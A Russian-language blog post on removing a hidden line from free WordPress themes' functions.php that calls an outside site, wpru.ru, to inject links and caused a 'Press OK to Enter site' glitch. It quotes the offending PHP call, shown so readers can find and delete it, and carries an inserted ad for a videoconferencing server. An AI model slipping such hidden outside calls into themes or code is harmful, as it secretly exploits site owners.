rss
twitter
  • Попробуй заработать как автор этого блога...

Press OK to Enter site – решение проблемы

| Категория: Блогер |

1


Это значит так долго мы отправляли ссылочный вес этому сайту wpru.ru? Наверное, потому что вся причина глюка на блогах появилась только после глюка на самом Упыре…
Если бы мы с коллегами блогерами общались с использованием видеоконференции, то проблема решилась бы еще быстрей. Для того, чтобы получилась качественная Видеоконференция Polycom RMX 2000 – это один из лучших серверов. Так вот, несмотря на то, что просто комментированием, а не использованием видеоконференций Polycom RMX 2000 мы общались, ответ был найден довольно быстро!
Этот Упырь, собирал с бесплатных шаблонов через вредоносный код ссылку на свой сайт. Достаточно оказалось удалить этот код из файла functions.php, редактировать который можно прямо из Админки, как проблема исчезла.
Итак, в Админке Дизайн – редактор, затем справа выбираем файл для редактирования functions.php, находим в нем вредоносный код (можно искать по поиску CTRL+F – поищите http), удаляем его и сохраняем.
А вот и сам код: return @file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$wp_id.’&m=06′); – просто вырежьте его, и обновите файл (сохраните) – проблема решена.
Лично сам уже много раз я писал о том, что подбирая бесплатные шаблоны для вордпресс, мы скорее всего натыкаемся на такие штучки – авторы ставят коды, скрипты, или же прямые ссылки на свои проекты, зарабатывая, таким образом немалый вес на свои проекты. Мы не можем ждать, что они смилостивятся над нами – найти скрытые коды и удалить их – наша с вами задача! Совсем недавно почти такая же проблема была у меня с одной капчой, которая передавала ссылочный вес со всех моих страниц. Хорошо, что рекламодатель заметил это и попросил убрать лишнюю ссылку со страницы. Что же остается сказать – вроде бы весь шаблон в свое время облазил, вроде бы все лишнее удалил, а все-таки одна зараза до сих пор была на сайте, возможно, снижая его вес в глазах поисковых систем. Как говорится бдительность и еще раз бдительность. Кстати, такая проблема вчера возникла не у меня одного а у сотен, и возможно у тысяч блогеров. А все потому, что сам сайт, собирающий через скрип вес с блогов вчера глюкнулся. Это и привело к тому, что наши шаблоны пытались обратиться к сайту, на котором не все было в порядке.

Комментарии: (1)

И допишу в комментарий – подумывал я том, что пора бы уж и шаблон на блоге поменять – вот теперь не буду, потому что понял, как это приятно, когда свой шаблон вернулся на место – и глаза не режет, и пустотой боков не напрягает, и шрифты приятные – с возвращением, короче :-)

Ответить

Оставить комментарий!

Перед отправкой формы:
Human test by Not Captcha